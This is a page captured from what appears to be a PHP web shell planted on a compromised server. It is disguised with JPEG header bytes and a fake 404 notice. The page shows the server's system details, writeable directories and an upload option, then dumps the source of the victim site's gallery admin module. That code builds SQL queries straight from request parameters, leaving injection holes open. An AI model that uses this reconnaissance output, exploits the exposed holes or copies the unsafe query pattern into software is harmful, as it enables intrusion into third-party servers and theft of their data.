����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/admin_new/mod/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/vidoe.top/admin_new/mod/album.php
<?php
class album{
    var $path_image	= "upload/gallery/";
    var $max_fsize	=  1500000;
    function album (){
        global $CORE;
        $arr_mid = array();
        switch($CORE->input['code']){
            default : $this->goList(); break;
            case 'post': $this->goPost(); break;
            case 'del': $this->goDel($arr_mid); break;

        }
    }
    function del_file(){
        global $DB,$CORE;
        $file_id = $CORE->input['file_id'];
        $id = intval(str_replace('pagesfile_','',$file_id));
        $row_check = $DB->fetch_row($DB->query("SELECT * FROM NNCCMS_pages_files WHERE id = '$id'"));
        if(!empty($row_check['file'])){
            @unlink(ROOT_PATH.$this->path_files.$row_check['file']);
        }
        $DB->query("DELETE FROM NNCCMS_pages_files WHERE id='$id'");
        echo $id;
        exit();
    }
    function del_size(){
        global $DB,$CORE;
        $size_id = $CORE->input['size_id'];
        $id = intval(str_replace('size_','',$size_id));
        $DB->query("DELETE FROM NNCCMS_pages_options_size WHERE id='$id'");
        echo $id;
        exit();
    }
    function del_img_sub(){
        global $DB,$CORE;
        $img_id = $CORE->input['img_id'];
        $id = intval(str_replace('pagesimg_','',$img_id));
        $row_check = $DB->fetch_row($DB->query("SELECT * FROM NNCCMS_images WHERE id = '$id'"));
        if(!empty($row_check['image'])){
            @unlink(ROOT_PATH.$this->path_image_sub.'thumb_'.$row_check['image']);
            @unlink(ROOT_PATH.$this->path_image_sub.$row_check['image']);
        }
        $DB->query("DELETE FROM NNCCMS_images WHERE id='$id'");
        echo $img_id;
        exit();
    }
    function dequy_selected($id,$parentid,$aCats,$res,$sep){
        foreach($aCats as $val){
            if($val['parent_id']==$parentid){
                if($id==$val['id'] and $parentid!=0){
                    $re = '<option value="'.$val['id'].'" selected>+'.$sep.''.$val['title'].'</option>';
                }else{
                    $re = '<option value="'.$val['id'].'">+'.$sep.''.$val['title'].'</option>';
                }
                $res .= $this->dequy_selected($id,$val['id'],$aCats,$re,$sep.'+');
            }
        }
        return $res;
    }
    function dequy_checked($arr_id,$parentid,$aCats,$res,$sep,$tep){
        foreach($aCats as $val){
            if($val['parent_id']==$parentid){
                if(in_array($val['id'],$arr_id,true)){
                    $re = '<li>'.$sep.''.$val['title'].'<input type="checkbox" name="menu_id[]" value="'.$val['id'].'" checked />'.$tep.'</li>';
                }else{
                    $re = '<li>'.$sep.''.$val['title'].'<input type="checkbox" name="menu_id[]" value="'.$val['id'].'" />'.$tep.'</li>';
                }
                $res .= $this->dequy_checked($arr_id,$val['id'],$aCats,$re,$sep.'<ul><li>',$tep.'</li></ul>');
            }
        }
        return $res;
    }
    function goList(){
        global $CORE, $DB, $smarty, $func, $print;
        $smarty->assign('module_name','Quản lý cuộc thi ảnh');
        $smarty->assign('title','album');
        $smarty->assign('status',$CORE->input['status']);
        $smarty->assign('section','list');
        $aCats = array();

        $where = " WHERE id<>'' ";
        $order = " ORDER BY time DESC ";
        $sort = $CORE->input['sort'];
        $fstatus  = $CORE->input['fstatus'];
        $fkeyword = trim($CORE->input['fkeyword']);

        if($fstatus!='')
        {
            $where .= " AND status = '".$fstatus."' ";
        }
        if($fkeyword!='')
        {
            $where .=  " AND (title_gallery LIKE '%".$fkeyword."%' OR fullname LIKE '%".$fkeyword."%') ";
            $nsearch = 1;
        }
        if($sort!=''){
            $order = " ORDER BY ".$sort." DESC ";
        }
        $smarty->assign('nsearch',$nsearch);
        if($CORE->input['nosearch']){ unset($_SESSION['fcat'],$_SESSION['fstatus'],$_SESSION['fkeyword']);}
        $pageNum = ($_GET['pageNum']>0) ? intval($_GET['pageNum']) : 1;
        $pageSize = 20;
        $from = (($pageNum * $pageSize) - $pageSize);
        $t = $DB->fetch_row($DB->query("SELECT count(id) as total FROM NNCCMS_gallery ".$where));
        $total = $t['total'];
        $totalPage = ceil($total / $pageSize);
        $query = $DB->query("SELECT * FROM NNCCMS_gallery ".$where." ".$order." LIMIT $from, $pageSize " );
        $arr_color = array('color:#FF0000','color:#00FF00','color:#0099FF','color:#333333','color:#663366');
        while($row = $DB->fetch_row($query))
        {

            if($row['img_pos1']==1){
                $row['img1'] =  $row['img1'];
            }
            if($row['img_pos2']==1){
                $row['img1'] =  $row['img2'];
            }
            if($row['img_pos3']==1){
                $row['img1'] =  $row['img3'];
            }
            if($row['img_pos4']==1){
                $row['img1'] =  $row['img4'];
            }
            if($row['img_pos5']==1){
                $row['img1'] =  $row['img5'];
            }
            $row['ftitle'] = $func->format_string($row['title_gallery']);
            $row['time'] = date('d-m-Y',$row['time']);
            $arr[] = $row;
        }
        $smarty->assign('list',$arr);
        $nav = $print->Pagination($totalPage,$pageNum,'pages','index.php?act=album&sort='.$sort.'&fstatus='.$fstatus.'&fkeyword='.$fkeyword);
        $smarty->assign('nav',$nav);
        $arr_mid = $CORE->input['mid_for_del'];
        if(!empty($arr_mid)){
            $type = $CORE->input['type'];
            switch($type){
                case 'del':
                    $this->goDel($arr_mid);
                    break;
                default:
                    $this->goAction($arr_mid,$type);
                    break;
            }
        }
    }
    function goPost(){
        global $CORE, $DB, $func, $smarty, $print;
        $smarty->assign('module_name','Quản lý album');
        $smarty->assign('title','album');
        $smarty->assign('status',$CORE->input['status']);
        $smarty->assign('section','post');
        $aCats = array();
        $query_menu = $DB->query("SELECT * FROM NNCCMS_menu WHERE `type`='menu'");
        while($rows_menu = $DB->fetch_row($query_menu))
        {
            $aCats[] = $rows_menu;
        }
        $menu = $this->dequy_selected(0,0,$aCats,'<option value="0">Tất cả</option>','','');
        $smarty->assign('menu',$menu);
        if($_SESSION['error']) unset($CORE->input['bsubmit']);
        if(!$CORE->input['bsubmit']){
            $id = intval($CORE->input['id']);
            if ($_SESSION['error']) $prevError = $_SESSION['error']; unset($_SESSION['error']);
            if ($_SESSION['state']) $prevState = $_SESSION['state']; unset($_SESSION['state']);
            if($prevState!=NULL){
                $data = $prevState;
            }else{
                if($id==0){
                    $data['status'] = 1;
                }else{
                    $query = $DB->query("SELECT * FROM NNCCMS_gallery WHERE id='".$id."'");
                    $data = $DB->fetch_row($query);
                }
            }
            $temp = $DB->query("SELECT * FROM NNCCMS_menu");
            while($data1 = $DB->fetch_row($temp)){
                $list_menu[] = $data1;
            }
            if($id>0){
                $q_menu_page = $DB->query("SELECT menu_id FROM NNCCMS_menu_pages WHERE pages_id='$id'");
                while($r_menu_page = $DB->fetch_row($q_menu_page)){
                    $arr_id[]  = $r_menu_page['menu_id'];
                }
            }else{
                $arr_id  = array();
            }

            $data['status'] = $func->yes_no($data['status'],'status');
            $data['tuan_1'] = $func->yes_no($data['tuan_1'],'tuan_1');
            $data['tuan_2'] = $func->yes_no($data['tuan_2'],'tuan_2');

            if($data['img_pos1']==1){
                $data['img1'] =  $data['img1'];
            }
            if($data['img_pos2']==1){
                $data['img1'] =  $data['img2'];
            }
            if($data['img_pos3']==1){
                $data['img1'] =  $data['img3'];
            }
            if($data['img_pos4']==1){
                $data['img1'] = $data['img4'];
            }
            if($data['img_pos5']==1){
                $data['img1'] = $data['img5'];
            }

            $error[] = $prevError;
            $smarty->assign('error',$error);
            $smarty->assign('post',$data);
        }else{
            $id = $state['id'] = intval($CORE->input['id']);
            $status = $state['status'] = intval($CORE->input['status']);
            $tuan_1 = intval($CORE->input['tuan_1']);
            $tuan_2 = intval($CORE->input['tuan_2']);

            $DB->query("UPDATE NNCCMS_gallery SET status = '$status',tuan_1='$tuan_1' ,tuan_2='$tuan_2' WHERE id='$id'");
            return $print->refresh("index.php?act=album&code=post&status=edit_success&id=".$id);

        }
    }
    function goAction($arr_mid,$type){
        global $DB, $print;
        foreach($arr_mid as $val){
            switch($type){
                case 'active':
                    $DB->query("UPDATE NNCCMS_gallery SET status='1' WHERE id='".$val."'");
                    break;
                case 'deactive':
                    $DB->query("UPDATE NNCCMS_gallery SET status='0' WHERE id='".$val."'");
                    break;

            }
        }
        $print->refresh('index.php?act=album&status=edit_success');
    }
    function goDel($arr_id){
        global $CORE, $DB, $print;
        if($CORE->admin_user['ug_id']!=4) exit('Chỉ có admin mới có quyền xóa bài!...');
        if(empty($arr_id)){
            $id	=	intval($CORE->input['id']);
            $query = $DB->query("SELECT * FROM NNCCMS_gallery WHERE id='".$id."'");
            $result = $DB->fetch_row($query);
            if($result['img1'] !=''){
                unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img1']);
            }
            if($result['img2'] !=''){
                unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img2']);
            }
            if($result['img3'] !=''){
                unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img3']);
            }
            if($result['img4'] !=''){
                unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img4']);
            }
            if($result['img5'] !=''){
                unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img5']);
            }
            $DB->query("DELETE FROM NNCCMS_gallery_vote WHERE id_gallery='$id'");
            $DB->query("DELETE FROM NNCCMS_gallery WHERE id='".$id."'");
            $print->refresh("index.php?act=album&status=del_success&cat=".$result['cid']);
            exit();
        }else{
            foreach($arr_id as $val){
                $query = $DB->query("SELECT * FROM NNCCMS_gallery WHERE id='".$val."'");
                $result = $DB->fetch_row($query);
                if($result['img1'] !=''){
                    unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img1']);
                }
                if($result['img2'] !=''){
                    unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img2']);
                }
                if($result['img3'] !=''){
                    unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img3']);
                }
                if($result['img4'] !=''){
                    unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img4']);
                }
                if($result['img5'] !=''){
                    unlink(ROOT_PATH.$this->path_image.$result['id'].'/'.$result['img5']);
                }
                $DB->query("DELETE FROM NNCCMS_gallery_vote WHERE id_gallery='$val'");
                $DB->query("DELETE FROM NNCCMS_gallery WHERE id='".$val."'");
            }
        }
        $print->refresh("index.php?act=album&status=del_success");
    }
}
$run = new album();
?>

ZeroDay Forums Mini